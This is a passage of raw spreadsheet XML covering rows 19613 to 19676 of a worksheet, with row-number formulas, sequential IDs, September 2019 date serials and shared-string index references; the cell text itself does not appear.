        <v>19612</v>
      </c>
      <c r="B19613">
        <v>4612</v>
      </c>
      <c r="C19613" t="s">
        <v>25497</v>
      </c>
      <c r="D19613" s="1">
        <v>43714</v>
      </c>
      <c r="F19613" t="s">
        <v>10021</v>
      </c>
      <c r="G19613" t="s">
        <v>31430</v>
      </c>
    </row>
    <row r="19614" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19614">
        <f t="shared" si="306"/>
        <v>19613</v>
      </c>
      <c r="B19614">
        <v>4613</v>
      </c>
      <c r="C19614" t="s">
        <v>25497</v>
      </c>
      <c r="D19614" s="1">
        <v>43717</v>
      </c>
      <c r="E19614" t="s">
        <v>25512</v>
      </c>
      <c r="F19614" t="s">
        <v>9975</v>
      </c>
      <c r="G19614" t="s">
        <v>31431</v>
      </c>
    </row>
    <row r="19615" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19615">
        <f t="shared" si="306"/>
        <v>19614</v>
      </c>
      <c r="B19615">
        <v>4614</v>
      </c>
      <c r="C19615" t="s">
        <v>25497</v>
      </c>
      <c r="D19615" s="1">
        <v>43718</v>
      </c>
      <c r="F19615" t="s">
        <v>9975</v>
      </c>
      <c r="G19615" t="s">
        <v>31432</v>
      </c>
    </row>
    <row r="19616" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19616">
        <f t="shared" si="306"/>
        <v>19615</v>
      </c>
      <c r="B19616">
        <v>4615</v>
      </c>
      <c r="C19616" t="s">
        <v>25497</v>
      </c>
      <c r="D19616" s="1">
        <v>43735</v>
      </c>
      <c r="E19616" t="s">
        <v>21431</v>
      </c>
      <c r="F19616" t="s">
        <v>10526</v>
      </c>
      <c r="G19616" t="s">
        <v>31433</v>
      </c>
    </row>
    <row r="19617" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19617">
        <f t="shared" si="306"/>
        <v>19616</v>
      </c>
      <c r="B19617">
        <v>4616</v>
      </c>
      <c r="C19617" t="s">
        <v>25497</v>
      </c>
      <c r="D19617" s="1">
        <v>43714</v>
      </c>
      <c r="F19617" t="s">
        <v>9975</v>
      </c>
      <c r="G19617" t="s">
        <v>31434</v>
      </c>
    </row>
    <row r="19618" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19618">
        <f t="shared" si="306"/>
        <v>19617</v>
      </c>
      <c r="B19618">
        <v>4617</v>
      </c>
      <c r="C19618" t="s">
        <v>25497</v>
      </c>
      <c r="D19618" s="1">
        <v>43735</v>
      </c>
      <c r="E19618" t="s">
        <v>27275</v>
      </c>
      <c r="F19618" t="s">
        <v>9975</v>
      </c>
      <c r="G19618" t="s">
        <v>31435</v>
      </c>
    </row>
    <row r="19619" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19619">
        <f t="shared" si="306"/>
        <v>19618</v>
      </c>
      <c r="B19619">
        <v>4618</v>
      </c>
      <c r="C19619" t="s">
        <v>25497</v>
      </c>
      <c r="D19619" s="1">
        <v>43732</v>
      </c>
      <c r="E19619" t="s">
        <v>31436</v>
      </c>
      <c r="F19619" t="s">
        <v>9975</v>
      </c>
      <c r="G19619" t="s">
        <v>31437</v>
      </c>
    </row>
    <row r="19620" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19620">
        <f t="shared" si="306"/>
        <v>19619</v>
      </c>
      <c r="B19620">
        <v>4619</v>
      </c>
      <c r="C19620" t="s">
        <v>25497</v>
      </c>
      <c r="D19620" s="1">
        <v>43731</v>
      </c>
      <c r="F19620" t="s">
        <v>10021</v>
      </c>
      <c r="G19620" t="s">
        <v>31438</v>
      </c>
    </row>
    <row r="19621" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19621">
        <f t="shared" si="306"/>
        <v>19620</v>
      </c>
      <c r="B19621">
        <v>4620</v>
      </c>
      <c r="C19621" t="s">
        <v>25497</v>
      </c>
      <c r="D19621" s="1">
        <v>43721</v>
      </c>
      <c r="F19621" t="s">
        <v>9975</v>
      </c>
      <c r="G19621" t="s">
        <v>31439</v>
      </c>
    </row>
    <row r="19622" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19622">
        <f t="shared" si="306"/>
        <v>19621</v>
      </c>
      <c r="B19622">
        <v>4621</v>
      </c>
      <c r="C19622" t="s">
        <v>25497</v>
      </c>
      <c r="D19622" s="1">
        <v>43728</v>
      </c>
      <c r="F19622" t="s">
        <v>9975</v>
      </c>
      <c r="G19622" t="s">
        <v>31440</v>
      </c>
    </row>
    <row r="19623" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19623">
        <f t="shared" si="306"/>
        <v>19622</v>
      </c>
      <c r="B19623">
        <v>4622</v>
      </c>
      <c r="C19623" t="s">
        <v>25497</v>
      </c>
      <c r="D19623" s="1">
        <v>43710</v>
      </c>
      <c r="E19623" t="s">
        <v>31441</v>
      </c>
      <c r="F19623" t="s">
        <v>9975</v>
      </c>
      <c r="G19623" t="s">
        <v>31442</v>
      </c>
    </row>
    <row r="19624" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19624">
        <f t="shared" si="306"/>
        <v>19623</v>
      </c>
      <c r="B19624">
        <v>4623</v>
      </c>
      <c r="C19624" t="s">
        <v>25497</v>
      </c>
      <c r="D19624" s="1">
        <v>43713</v>
      </c>
      <c r="E19624" t="s">
        <v>25584</v>
      </c>
      <c r="F19624" t="s">
        <v>9975</v>
      </c>
      <c r="G19624" t="s">
        <v>31443</v>
      </c>
    </row>
    <row r="19625" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19625">
        <f t="shared" si="306"/>
        <v>19624</v>
      </c>
      <c r="B19625">
        <v>4624</v>
      </c>
      <c r="C19625" t="s">
        <v>25497</v>
      </c>
      <c r="D19625" s="1">
        <v>43729</v>
      </c>
      <c r="E19625" t="s">
        <v>25509</v>
      </c>
      <c r="F19625" t="s">
        <v>10021</v>
      </c>
      <c r="G19625" t="s">
        <v>31444</v>
      </c>
    </row>
    <row r="19626" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19626">
        <f t="shared" si="306"/>
        <v>19625</v>
      </c>
      <c r="B19626">
        <v>4625</v>
      </c>
      <c r="C19626" t="s">
        <v>25497</v>
      </c>
      <c r="D19626" s="1">
        <v>43728</v>
      </c>
      <c r="E19626" t="s">
        <v>31445</v>
      </c>
      <c r="F19626" t="s">
        <v>9975</v>
      </c>
      <c r="G19626" t="s">
        <v>31446</v>
      </c>
    </row>
    <row r="19627" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19627">
        <f t="shared" si="306"/>
        <v>19626</v>
      </c>
      <c r="B19627">
        <v>4626</v>
      </c>
      <c r="C19627" t="s">
        <v>25497</v>
      </c>
      <c r="D19627" s="1">
        <v>43726</v>
      </c>
      <c r="E19627" t="s">
        <v>25517</v>
      </c>
      <c r="F19627" t="s">
        <v>9975</v>
      </c>
      <c r="G19627" t="s">
        <v>31447</v>
      </c>
    </row>
    <row r="19628" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19628">
        <f t="shared" si="306"/>
        <v>19627</v>
      </c>
      <c r="B19628">
        <v>4627</v>
      </c>
      <c r="C19628" t="s">
        <v>25497</v>
      </c>
      <c r="D19628" s="1">
        <v>43719</v>
      </c>
      <c r="E19628" t="s">
        <v>31448</v>
      </c>
      <c r="F19628" t="s">
        <v>10526</v>
      </c>
      <c r="G19628" t="s">
        <v>31449</v>
      </c>
    </row>
    <row r="19629" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19629">
        <f t="shared" si="306"/>
        <v>19628</v>
      </c>
      <c r="B19629">
        <v>4628</v>
      </c>
      <c r="C19629" t="s">
        <v>25497</v>
      </c>
      <c r="D19629" s="1">
        <v>43718</v>
      </c>
      <c r="F19629" t="s">
        <v>9975</v>
      </c>
      <c r="G19629" t="s">
        <v>31450</v>
      </c>
    </row>
    <row r="19630" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19630">
        <f t="shared" si="306"/>
        <v>19629</v>
      </c>
      <c r="B19630">
        <v>4629</v>
      </c>
      <c r="C19630" t="s">
        <v>25497</v>
      </c>
      <c r="D19630" s="1">
        <v>43731</v>
      </c>
      <c r="F19630" t="s">
        <v>9975</v>
      </c>
      <c r="G19630" t="s">
        <v>31451</v>
      </c>
    </row>
    <row r="19631" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19631">
        <f t="shared" si="306"/>
        <v>19630</v>
      </c>
      <c r="B19631">
        <v>4630</v>
      </c>
      <c r="C19631" t="s">
        <v>25497</v>
      </c>
      <c r="D19631" s="1">
        <v>43736</v>
      </c>
      <c r="E19631" t="s">
        <v>25509</v>
      </c>
      <c r="F19631" t="s">
        <v>10021</v>
      </c>
      <c r="G19631" t="s">
        <v>31452</v>
      </c>
    </row>
    <row r="19632" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19632">
        <f t="shared" si="306"/>
        <v>19631</v>
      </c>
      <c r="B19632">
        <v>4631</v>
      </c>
      <c r="C19632" t="s">
        <v>25497</v>
      </c>
      <c r="D19632" s="1">
        <v>43727</v>
      </c>
      <c r="E19632" t="s">
        <v>31453</v>
      </c>
      <c r="F19632" t="s">
        <v>9975</v>
      </c>
      <c r="G19632" t="s">
        <v>31454</v>
      </c>
    </row>
    <row r="19633" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19633">
        <f t="shared" si="306"/>
        <v>19632</v>
      </c>
      <c r="B19633">
        <v>4632</v>
      </c>
      <c r="C19633" t="s">
        <v>25497</v>
      </c>
      <c r="D19633" s="1">
        <v>43736</v>
      </c>
      <c r="E19633" t="s">
        <v>31455</v>
      </c>
      <c r="F19633" t="s">
        <v>9975</v>
      </c>
      <c r="G19633" t="s">
        <v>31456</v>
      </c>
    </row>
    <row r="19634" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19634">
        <f t="shared" si="306"/>
        <v>19633</v>
      </c>
      <c r="B19634">
        <v>4633</v>
      </c>
      <c r="C19634" t="s">
        <v>25497</v>
      </c>
      <c r="D19634" s="1">
        <v>43731</v>
      </c>
      <c r="E19634" t="s">
        <v>25592</v>
      </c>
      <c r="F19634" t="s">
        <v>9975</v>
      </c>
      <c r="G19634" t="s">
        <v>31457</v>
      </c>
    </row>
    <row r="19635" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19635">
        <f t="shared" si="306"/>
        <v>19634</v>
      </c>
      <c r="B19635">
        <v>4634</v>
      </c>
      <c r="C19635" t="s">
        <v>25497</v>
      </c>
      <c r="D19635" s="1">
        <v>43720</v>
      </c>
      <c r="F19635" t="s">
        <v>9975</v>
      </c>
      <c r="G19635" t="s">
        <v>28965</v>
      </c>
    </row>
    <row r="19636" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19636">
        <f t="shared" si="306"/>
        <v>19635</v>
      </c>
      <c r="B19636">
        <v>4635</v>
      </c>
      <c r="C19636" t="s">
        <v>25497</v>
      </c>
      <c r="D19636" s="1">
        <v>43717</v>
      </c>
      <c r="E19636" t="s">
        <v>31458</v>
      </c>
      <c r="F19636" t="s">
        <v>9975</v>
      </c>
      <c r="G19636" t="s">
        <v>31459</v>
      </c>
    </row>
    <row r="19637" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19637">
        <f t="shared" si="306"/>
        <v>19636</v>
      </c>
      <c r="B19637">
        <v>4636</v>
      </c>
      <c r="C19637" t="s">
        <v>25497</v>
      </c>
      <c r="D19637" s="1">
        <v>43712</v>
      </c>
      <c r="F19637" t="s">
        <v>9975</v>
      </c>
      <c r="G19637" t="s">
        <v>31460</v>
      </c>
    </row>
    <row r="19638" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19638">
        <f t="shared" si="306"/>
        <v>19637</v>
      </c>
      <c r="B19638">
        <v>4637</v>
      </c>
      <c r="C19638" t="s">
        <v>25497</v>
      </c>
      <c r="D19638" s="1">
        <v>43733</v>
      </c>
      <c r="E19638" t="s">
        <v>25538</v>
      </c>
      <c r="F19638" t="s">
        <v>9975</v>
      </c>
      <c r="G19638" t="s">
        <v>31461</v>
      </c>
    </row>
    <row r="19639" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19639">
        <f t="shared" si="306"/>
        <v>19638</v>
      </c>
      <c r="B19639">
        <v>4638</v>
      </c>
      <c r="C19639" t="s">
        <v>25497</v>
      </c>
      <c r="D19639" s="1">
        <v>43725</v>
      </c>
      <c r="F19639" t="s">
        <v>9975</v>
      </c>
      <c r="G19639" t="s">
        <v>31462</v>
      </c>
    </row>
    <row r="19640" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19640">
        <f t="shared" si="306"/>
        <v>19639</v>
      </c>
      <c r="B19640">
        <v>4639</v>
      </c>
      <c r="C19640" t="s">
        <v>25497</v>
      </c>
      <c r="D19640" s="1">
        <v>43731</v>
      </c>
      <c r="E19640" t="s">
        <v>27023</v>
      </c>
      <c r="F19640" t="s">
        <v>9978</v>
      </c>
      <c r="G19640" t="s">
        <v>31463</v>
      </c>
    </row>
    <row r="19641" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19641">
        <f t="shared" si="306"/>
        <v>19640</v>
      </c>
      <c r="B19641">
        <v>4640</v>
      </c>
      <c r="C19641" t="s">
        <v>25497</v>
      </c>
      <c r="D19641" s="1">
        <v>43734</v>
      </c>
      <c r="E19641" t="s">
        <v>31464</v>
      </c>
      <c r="F19641" t="s">
        <v>9975</v>
      </c>
      <c r="G19641" t="s">
        <v>31465</v>
      </c>
    </row>
    <row r="19642" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19642">
        <f t="shared" si="306"/>
        <v>19641</v>
      </c>
      <c r="B19642">
        <v>4641</v>
      </c>
      <c r="C19642" t="s">
        <v>25497</v>
      </c>
      <c r="D19642" s="1">
        <v>43712</v>
      </c>
      <c r="E19642" t="s">
        <v>25517</v>
      </c>
      <c r="F19642" t="s">
        <v>9975</v>
      </c>
      <c r="G19642" t="s">
        <v>31466</v>
      </c>
    </row>
    <row r="19643" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19643">
        <f t="shared" si="306"/>
        <v>19642</v>
      </c>
      <c r="B19643">
        <v>4642</v>
      </c>
      <c r="C19643" t="s">
        <v>25497</v>
      </c>
      <c r="D19643" s="1">
        <v>43735</v>
      </c>
      <c r="E19643" t="s">
        <v>31467</v>
      </c>
      <c r="F19643" t="s">
        <v>9975</v>
      </c>
      <c r="G19643" t="s">
        <v>31468</v>
      </c>
    </row>
    <row r="19644" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19644">
        <f t="shared" si="306"/>
        <v>19643</v>
      </c>
      <c r="B19644">
        <v>4643</v>
      </c>
      <c r="C19644" t="s">
        <v>25497</v>
      </c>
      <c r="D19644" s="1">
        <v>43720</v>
      </c>
      <c r="F19644" t="s">
        <v>9975</v>
      </c>
      <c r="G19644" t="s">
        <v>31469</v>
      </c>
    </row>
    <row r="19645" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19645">
        <f t="shared" si="306"/>
        <v>19644</v>
      </c>
      <c r="B19645">
        <v>4644</v>
      </c>
      <c r="C19645" t="s">
        <v>25497</v>
      </c>
      <c r="D19645" s="1">
        <v>43710</v>
      </c>
      <c r="E19645" t="s">
        <v>25517</v>
      </c>
      <c r="F19645" t="s">
        <v>9975</v>
      </c>
      <c r="G19645" t="s">
        <v>31470</v>
      </c>
    </row>
    <row r="19646" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19646">
        <f t="shared" si="306"/>
        <v>19645</v>
      </c>
      <c r="B19646">
        <v>4645</v>
      </c>
      <c r="C19646" t="s">
        <v>25497</v>
      </c>
      <c r="D19646" s="1">
        <v>43720</v>
      </c>
      <c r="F19646" t="s">
        <v>9975</v>
      </c>
      <c r="G19646" t="s">
        <v>31471</v>
      </c>
    </row>
    <row r="19647" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19647">
        <f t="shared" si="306"/>
        <v>19646</v>
      </c>
      <c r="B19647">
        <v>4646</v>
      </c>
      <c r="C19647" t="s">
        <v>25497</v>
      </c>
      <c r="D19647" s="1">
        <v>43726</v>
      </c>
      <c r="E19647" t="s">
        <v>31472</v>
      </c>
      <c r="F19647" t="s">
        <v>9975</v>
      </c>
      <c r="G19647" t="s">
        <v>31473</v>
      </c>
    </row>
    <row r="19648" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19648">
        <f t="shared" si="306"/>
        <v>19647</v>
      </c>
      <c r="B19648">
        <v>4647</v>
      </c>
      <c r="C19648" t="s">
        <v>25497</v>
      </c>
      <c r="D19648" s="1">
        <v>43725</v>
      </c>
      <c r="F19648" t="s">
        <v>9978</v>
      </c>
      <c r="G19648" t="s">
        <v>31474</v>
      </c>
    </row>
    <row r="19649" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19649">
        <f t="shared" si="306"/>
        <v>19648</v>
      </c>
      <c r="B19649">
        <v>4648</v>
      </c>
      <c r="C19649" t="s">
        <v>25497</v>
      </c>
      <c r="D19649" s="1">
        <v>43721</v>
      </c>
      <c r="E19649" t="s">
        <v>25774</v>
      </c>
      <c r="F19649" t="s">
        <v>9975</v>
      </c>
      <c r="G19649" t="s">
        <v>31475</v>
      </c>
    </row>
    <row r="19650" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19650">
        <f t="shared" si="306"/>
        <v>19649</v>
      </c>
      <c r="B19650">
        <v>4649</v>
      </c>
      <c r="C19650" t="s">
        <v>25497</v>
      </c>
      <c r="D19650" s="1">
        <v>43731</v>
      </c>
      <c r="E19650" t="s">
        <v>25592</v>
      </c>
      <c r="F19650" t="s">
        <v>9975</v>
      </c>
      <c r="G19650" t="s">
        <v>31476</v>
      </c>
    </row>
    <row r="19651" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19651">
        <f t="shared" ref="A19651:A19714" si="307">+ROW(A19650)</f>
        <v>19650</v>
      </c>
      <c r="B19651">
        <v>4650</v>
      </c>
      <c r="C19651" t="s">
        <v>25497</v>
      </c>
      <c r="D19651" s="1">
        <v>43725</v>
      </c>
      <c r="E19651" t="s">
        <v>31477</v>
      </c>
      <c r="F19651" t="s">
        <v>9975</v>
      </c>
      <c r="G19651" t="s">
        <v>31478</v>
      </c>
    </row>
    <row r="19652" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19652">
        <f t="shared" si="307"/>
        <v>19651</v>
      </c>
      <c r="B19652">
        <v>4651</v>
      </c>
      <c r="C19652" t="s">
        <v>25497</v>
      </c>
      <c r="D19652" s="1">
        <v>43736</v>
      </c>
      <c r="E19652" t="s">
        <v>25509</v>
      </c>
      <c r="F19652" t="s">
        <v>10021</v>
      </c>
      <c r="G19652" t="s">
        <v>31479</v>
      </c>
    </row>
    <row r="19653" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19653">
        <f t="shared" si="307"/>
        <v>19652</v>
      </c>
      <c r="B19653">
        <v>4652</v>
      </c>
      <c r="C19653" t="s">
        <v>25497</v>
      </c>
      <c r="D19653" s="1">
        <v>43714</v>
      </c>
      <c r="E19653" t="s">
        <v>25512</v>
      </c>
      <c r="F19653" t="s">
        <v>9975</v>
      </c>
      <c r="G19653" t="s">
        <v>31480</v>
      </c>
    </row>
    <row r="19654" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19654">
        <f t="shared" si="307"/>
        <v>19653</v>
      </c>
      <c r="B19654">
        <v>4653</v>
      </c>
      <c r="C19654" t="s">
        <v>25497</v>
      </c>
      <c r="D19654" s="1">
        <v>43728</v>
      </c>
      <c r="F19654" t="s">
        <v>9975</v>
      </c>
      <c r="G19654" t="s">
        <v>31481</v>
      </c>
    </row>
    <row r="19655" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19655">
        <f t="shared" si="307"/>
        <v>19654</v>
      </c>
      <c r="B19655">
        <v>4654</v>
      </c>
      <c r="C19655" t="s">
        <v>25497</v>
      </c>
      <c r="D19655" s="1">
        <v>43718</v>
      </c>
      <c r="E19655" t="s">
        <v>31482</v>
      </c>
      <c r="F19655" t="s">
        <v>9975</v>
      </c>
      <c r="G19655" t="s">
        <v>31483</v>
      </c>
    </row>
    <row r="19656" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19656">
        <f t="shared" si="307"/>
        <v>19655</v>
      </c>
      <c r="B19656">
        <v>4655</v>
      </c>
      <c r="C19656" t="s">
        <v>25497</v>
      </c>
      <c r="D19656" s="1">
        <v>43717</v>
      </c>
      <c r="F19656" t="s">
        <v>9975</v>
      </c>
      <c r="G19656" t="s">
        <v>31484</v>
      </c>
    </row>
    <row r="19657" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19657">
        <f t="shared" si="307"/>
        <v>19656</v>
      </c>
      <c r="B19657">
        <v>4656</v>
      </c>
      <c r="C19657" t="s">
        <v>25497</v>
      </c>
      <c r="D19657" s="1">
        <v>43725</v>
      </c>
      <c r="F19657" t="s">
        <v>9975</v>
      </c>
      <c r="G19657" t="s">
        <v>31485</v>
      </c>
    </row>
    <row r="19658" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19658">
        <f t="shared" si="307"/>
        <v>19657</v>
      </c>
      <c r="B19658">
        <v>4657</v>
      </c>
      <c r="C19658" t="s">
        <v>25497</v>
      </c>
      <c r="D19658" s="1">
        <v>43735</v>
      </c>
      <c r="E19658" t="s">
        <v>31486</v>
      </c>
      <c r="F19658" t="s">
        <v>9975</v>
      </c>
      <c r="G19658" t="s">
        <v>31487</v>
      </c>
    </row>
    <row r="19659" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19659">
        <f t="shared" si="307"/>
        <v>19658</v>
      </c>
      <c r="B19659">
        <v>4658</v>
      </c>
      <c r="C19659" t="s">
        <v>25497</v>
      </c>
      <c r="D19659" s="1">
        <v>43710</v>
      </c>
      <c r="E19659" t="s">
        <v>25509</v>
      </c>
      <c r="F19659" t="s">
        <v>10021</v>
      </c>
      <c r="G19659" t="s">
        <v>31488</v>
      </c>
    </row>
    <row r="19660" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19660">
        <f t="shared" si="307"/>
        <v>19659</v>
      </c>
      <c r="B19660">
        <v>4659</v>
      </c>
      <c r="C19660" t="s">
        <v>25497</v>
      </c>
      <c r="D19660" s="1">
        <v>43728</v>
      </c>
      <c r="F19660" t="s">
        <v>9975</v>
      </c>
      <c r="G19660" t="s">
        <v>31489</v>
      </c>
    </row>
    <row r="19661" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19661">
        <f t="shared" si="307"/>
        <v>19660</v>
      </c>
      <c r="B19661">
        <v>4660</v>
      </c>
      <c r="C19661" t="s">
        <v>25497</v>
      </c>
      <c r="D19661" s="1">
        <v>43717</v>
      </c>
      <c r="E19661" t="s">
        <v>25512</v>
      </c>
      <c r="F19661" t="s">
        <v>9975</v>
      </c>
      <c r="G19661" t="s">
        <v>31490</v>
      </c>
    </row>
    <row r="19662" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19662">
        <f t="shared" si="307"/>
        <v>19661</v>
      </c>
      <c r="B19662">
        <v>4661</v>
      </c>
      <c r="C19662" t="s">
        <v>25497</v>
      </c>
      <c r="D19662" s="1">
        <v>43722</v>
      </c>
      <c r="F19662" t="s">
        <v>9975</v>
      </c>
      <c r="G19662" t="s">
        <v>31491</v>
      </c>
    </row>
    <row r="19663" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19663">
        <f t="shared" si="307"/>
        <v>19662</v>
      </c>
      <c r="B19663">
        <v>4662</v>
      </c>
      <c r="C19663" t="s">
        <v>25497</v>
      </c>
      <c r="D19663" s="1">
        <v>43735</v>
      </c>
      <c r="E19663" t="s">
        <v>31492</v>
      </c>
      <c r="F19663" t="s">
        <v>9975</v>
      </c>
      <c r="G19663" t="s">
        <v>31493</v>
      </c>
    </row>
    <row r="19664" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19664">
        <f t="shared" si="307"/>
        <v>19663</v>
      </c>
      <c r="B19664">
        <v>4663</v>
      </c>
      <c r="C19664" t="s">
        <v>25497</v>
      </c>
      <c r="D19664" s="1">
        <v>43717</v>
      </c>
      <c r="E19664" t="s">
        <v>25512</v>
      </c>
      <c r="F19664" t="s">
        <v>9975</v>
      </c>
      <c r="G19664" t="s">
        <v>31494</v>
      </c>
    </row>
    <row r="19665" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19665">
        <f t="shared" si="307"/>
        <v>19664</v>
      </c>
      <c r="B19665">
        <v>4664</v>
      </c>
      <c r="C19665" t="s">
        <v>25497</v>
      </c>
      <c r="D19665" s="1">
        <v>43718</v>
      </c>
      <c r="E19665" t="s">
        <v>31495</v>
      </c>
      <c r="F19665" t="s">
        <v>9978</v>
      </c>
      <c r="G19665" t="s">
        <v>31496</v>
      </c>
    </row>
    <row r="19666" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19666">
        <f t="shared" si="307"/>
        <v>19665</v>
      </c>
      <c r="B19666">
        <v>4665</v>
      </c>
      <c r="C19666" t="s">
        <v>25497</v>
      </c>
      <c r="D19666" s="1">
        <v>43735</v>
      </c>
      <c r="E19666" t="s">
        <v>25592</v>
      </c>
      <c r="F19666" t="s">
        <v>9975</v>
      </c>
      <c r="G19666" t="s">
        <v>31497</v>
      </c>
    </row>
    <row r="19667" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19667">
        <f t="shared" si="307"/>
        <v>19666</v>
      </c>
      <c r="B19667">
        <v>4666</v>
      </c>
      <c r="C19667" t="s">
        <v>25497</v>
      </c>
      <c r="D19667" s="1">
        <v>43717</v>
      </c>
      <c r="F19667" t="s">
        <v>9975</v>
      </c>
      <c r="G19667" t="s">
        <v>31498</v>
      </c>
    </row>
    <row r="19668" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19668">
        <f t="shared" si="307"/>
        <v>19667</v>
      </c>
      <c r="B19668">
        <v>4667</v>
      </c>
      <c r="C19668" t="s">
        <v>25497</v>
      </c>
      <c r="D19668" s="1">
        <v>43728</v>
      </c>
      <c r="F19668" t="s">
        <v>9975</v>
      </c>
      <c r="G19668" t="s">
        <v>31499</v>
      </c>
    </row>
    <row r="19669" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19669">
        <f t="shared" si="307"/>
        <v>19668</v>
      </c>
      <c r="B19669">
        <v>4668</v>
      </c>
      <c r="C19669" t="s">
        <v>25497</v>
      </c>
      <c r="D19669" s="1">
        <v>43733</v>
      </c>
      <c r="E19669" t="s">
        <v>31500</v>
      </c>
      <c r="F19669" t="s">
        <v>9975</v>
      </c>
      <c r="G19669" t="s">
        <v>31501</v>
      </c>
    </row>
    <row r="19670" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19670">
        <f t="shared" si="307"/>
        <v>19669</v>
      </c>
      <c r="B19670">
        <v>4669</v>
      </c>
      <c r="C19670" t="s">
        <v>25497</v>
      </c>
      <c r="D19670" s="1">
        <v>43732</v>
      </c>
      <c r="F19670" t="s">
        <v>9975</v>
      </c>
      <c r="G19670" t="s">
        <v>31502</v>
      </c>
    </row>
    <row r="19671" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19671">
        <f t="shared" si="307"/>
        <v>19670</v>
      </c>
      <c r="B19671">
        <v>4670</v>
      </c>
      <c r="C19671" t="s">
        <v>25497</v>
      </c>
      <c r="D19671" s="1">
        <v>43718</v>
      </c>
      <c r="E19671" t="s">
        <v>25592</v>
      </c>
      <c r="F19671" t="s">
        <v>9975</v>
      </c>
      <c r="G19671" t="s">
        <v>31503</v>
      </c>
    </row>
    <row r="19672" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19672">
        <f t="shared" si="307"/>
        <v>19671</v>
      </c>
      <c r="B19672">
        <v>4671</v>
      </c>
      <c r="C19672" t="s">
        <v>25497</v>
      </c>
      <c r="D19672" s="1">
        <v>43735</v>
      </c>
      <c r="E19672" t="s">
        <v>25509</v>
      </c>
      <c r="F19672" t="s">
        <v>10021</v>
      </c>
      <c r="G19672" t="s">
        <v>31504</v>
      </c>
    </row>
    <row r="19673" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19673">
        <f t="shared" si="307"/>
        <v>19672</v>
      </c>
      <c r="B19673">
        <v>4672</v>
      </c>
      <c r="C19673" t="s">
        <v>25497</v>
      </c>
      <c r="D19673" s="1">
        <v>43715</v>
      </c>
      <c r="E19673" t="s">
        <v>31505</v>
      </c>
      <c r="F19673" t="s">
        <v>9975</v>
      </c>
      <c r="G19673" t="s">
        <v>31506</v>
      </c>
    </row>
    <row r="19674" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19674">
        <f t="shared" si="307"/>
        <v>19673</v>
      </c>
      <c r="B19674">
        <v>4673</v>
      </c>
      <c r="C19674" t="s">
        <v>25497</v>
      </c>
      <c r="D19674" s="1">
        <v>43737</v>
      </c>
      <c r="E19674" t="s">
        <v>28187</v>
      </c>
      <c r="F19674" t="s">
        <v>10526</v>
      </c>
      <c r="G19674" t="s">
        <v>31507</v>
      </c>
    </row>
    <row r="19675" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19675">
        <f t="shared" si="307"/>
        <v>19674</v>
      </c>
      <c r="B19675">
        <v>4674</v>
      </c>
      <c r="C19675" t="s">
        <v>25497</v>
      </c>
      <c r="D19675" s="1">
        <v>43711</v>
      </c>
      <c r="E19675" t="s">
        <v>31508</v>
      </c>
      <c r="F19675" t="s">
        <v>9975</v>
      </c>
      <c r="G19675" t="s">
        <v>31509</v>
      </c>
    </row>
    <row r="19676" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19676">
        <f t="shared" si="307"/>
        <v>19675</v>
      </c>
      <c r="B19676">
        <v>4675</v>
      </c>
      <c r="C19676" t="s">
        <v>25497</v>
      </c>
      <c r="D19676" s="1">
        <v>43727</v>
      </c>
      <c r="E19676" t="s">
